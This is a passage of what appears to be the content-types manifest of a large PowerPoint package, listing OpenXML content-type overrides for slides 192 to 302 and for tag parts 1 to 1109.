  <Override PartName="/ppt/slides/slide192.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide193.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide194.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide195.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide196.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide197.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide198.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide199.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide200.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide201.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide202.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide203.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide204.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide205.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide206.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide207.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide208.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide209.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide210.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide211.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide212.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide213.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide214.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide215.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide216.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide217.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide218.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide219.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide220.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide221.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide222.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide223.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide224.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide225.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide226.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide227.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide228.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide229.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide230.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide231.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide232.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide233.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide234.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide235.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide236.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide237.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide238.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide239.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide240.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide241.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide242.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide243.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide244.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide245.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide246.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide247.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide248.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide249.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide25.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide250.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide251.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide252.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide253.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide254.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide255.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide256.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide257.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide258.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide259.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide26.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide260.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide261.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide262.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide263.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide264.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide265.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide266.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide267.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide268.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide269.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide27.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide270.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide271.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide272.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide273.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide274.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide275.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide276.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide277.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide278.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide279.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide28.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide280.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide281.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide282.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide283.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide284.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide285.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide286.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide287.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide288.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide289.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide29.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide290.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide291.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide292.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide293.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide294.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide295.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide296.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide297.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide298.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide299.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide30.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide300.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide301.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide302.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tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/>
  <Override PartName="/ppt/tags/tag1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag100.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1000.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1001.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1002.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1003.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1004.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1005.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1006.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1007.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1008.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1009.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1010.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1011.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1012.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1013.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1014.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1015.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1016.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1017.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1018.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1019.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag102.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1020.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1021.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1022.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1023.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1024.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1025.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1026.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1027.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1028.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1029.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1030.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1031.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1032.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1033.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1034.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1035.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1036.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1037.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1038.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1039.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1040.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1041.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1042.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1043.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1044.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1045.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1046.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1047.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1048.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1049.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1050.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1051.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1052.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1053.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1054.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1055.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1056.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1057.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1058.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1059.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1060.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1061.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1062.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1063.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1064.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1065.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1066.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1067.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1068.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1069.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1070.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1071.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1072.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1073.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1074.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1075.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1076.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1077.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1078.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1079.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1080.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1081.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1082.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1083.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1084.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1085.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1086.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1087.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1088.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1089.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1090.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1091.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1092.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1093.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1094.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1095.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1096.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1097.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1098.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1099.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1100.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1102.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/tags/tag1109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
